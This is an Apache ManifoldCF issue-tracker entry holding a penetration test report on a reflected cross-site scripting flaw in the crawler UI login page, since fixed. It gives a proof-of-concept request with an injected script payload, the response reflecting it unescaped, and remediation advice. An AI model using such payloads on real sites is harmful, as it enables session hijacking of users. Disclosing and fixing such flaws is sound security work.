Uploaded image for project: 'ManifoldCF'
  1. ManifoldCF
  2. CONNECTORS-1597

reflected cross-site scripting vulnerability

    XMLWordPrintableJSON

Details

    • Improvement
    • Status: Resolved
    • Minor
    • Resolution: Fixed
    • ManifoldCF 2.12
    • ManifoldCF 2.13
    • API
    • None

    Description

      This is the full report of a penetration test, performed at a client where we deployed a system which uses manifold:

      Summary
      A reflected cross-site scripting vulnerability was discovered in the application.
      Reflected cross-site scripting occurs when a web application displays data submitted by the user that
      contains HTML markup and scripting code without properly escaping it. An attacker will create a link to the
      vulnerable page that will display JavaScript code crated by the attacker. The attacker will then trick an
      authenticated application user into clicking or following this crated link. When the user's browser parses the
      generated page, it will execute the code crafted by the attacker. If the user was logged in to the application
      when he followed the link, the attacker's code could perform any action in the application that the user can
      perform.

      Impact
      Reflected cross-site scripting can be used by attackers to compromise the session of an authenticated user.
      By persuading the victim to click on a specially crafted link, the attacker can execute his own JavaScript
      payload in the browser context of the victim. In this specific case, an attacker could hijack its victim's session
      given that the session token is not flagged as HttpOnly as demonstrated in [G190204T1F4][MANIFOLD]
      Insecure Cookie Configuration.
      Additional attacks exist where an attacker can deceive end users of the application by redirecting them to
      replica sites or trick them into downloading trojans or other malware. The attacker can also use a so called
      browser exploitation framework. In this scenario the attacker injects JavaScript code that communicates to
      the attack framework running on the attacker's computer. When the victim user executes the JavaScript code
      the attacker can control the victim's browser. Publicly available frameworks exist (BeEF -
      http://www.bindshell.net/tools/beef, Backframe -http://www.gnucitizen.org/projects/backframe/, XSS Proxy -
      http://xss-proxy.sourceforge.net/).

      Affected Systems

      Description
      A case where the application includes user input into the generated HTML pages without properly escaping
      the user supplied data was discovered in the application. The HTTP requests and responses shown below
      demonstrate the problem.

      GET /mcf-crawler-ui/?smafi"><script>alert(1)</script>non7x=1 HTTP/1.1
Host: els-manifold-uat.bc:8475
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: JSESSIONID=ov3qae9biucxdat0xiin5s18

      HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Mon, 18 Feb 2019 13:07:02 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 2576
Connection: close
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
max-age: Thu, 01 Jan 1970 00:00:00 GMT
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html>
<meta http-equiv="X-UA-Compatible" content="IE=edge"/>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta content='width=device-width, initial-scale=1, maximum-scale=1, userscalable=
no' name='viewport'>
<link href="css/font-awesome.min.css" rel="stylesheet" type="text/css"/>
<link href="bootstrap/css/bootstrap.min.css" rel="stylesheet" type="text/css"/>
<link rel="StyleSheet" href="css/style.css" type="text/css" media="screen"/>
<title>Apache ManifoldCF™ Login</title>
<script type="text/javascript">
<!--
function login()
{
document.loginform.submit();
}
document.onkeypress = loginKeyPress;
function loginKeyPress(e)
{
e = e || window.event;
if (e.keyCode == 13)
{
document.getElementById('buttonLogin').click();
return false;
}
return true;
}
//-->
</script>
</head>
<body class="login-page">
<div class="login-box">
<div class="login-logo">
<a href="/"><img src="ManifoldCF-logo.png"/></a>
</div>
<!-- /.login-logo -->
<div class="login-box-body">
<p class="login-box-msg">Sign in to start your session</p>
<form class="standardform" name="loginform" action="setupAdminProfile.jsp"
method="POST">
<input type="hidden" name="nextUrl" value="index.jsp?
smafi"><script>alert(1)</script>non7x=1">
<div class="form-group has-feedback">
--snip--

      Recommendations
      We recommend that the application enforces proper validation on user input. In most situations where usercontrollable
      data is copied into application responses, cross-site scripting attacks can be prevented using two
      layers of defenses:

      • Input should be validated as strictly as possible on arrival, given the kind of content which it is
        expected to contain. For example, personal names should consist of alphabetical and a small range
        of typographical characters, and be relatively short; a year of birth should consist of exactly four
        numerals; email addresses should match a well-defined regular expression. Input which fails the
        validation should be rejected, not sanitized.
      • User input should be HTML-encoded at any point where it is copied into application responses. All
        HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML
        entities (< > etc).

      References

      Attachments

        Activity

          People

            kishorekumar Kishore Kumar
            goovaertsr roel goovaerts
            Votes:
            0 Vote for this issue
            Watchers:
            3 Start watching this issue

            Dates

              Created:
              Updated:
              Resolved: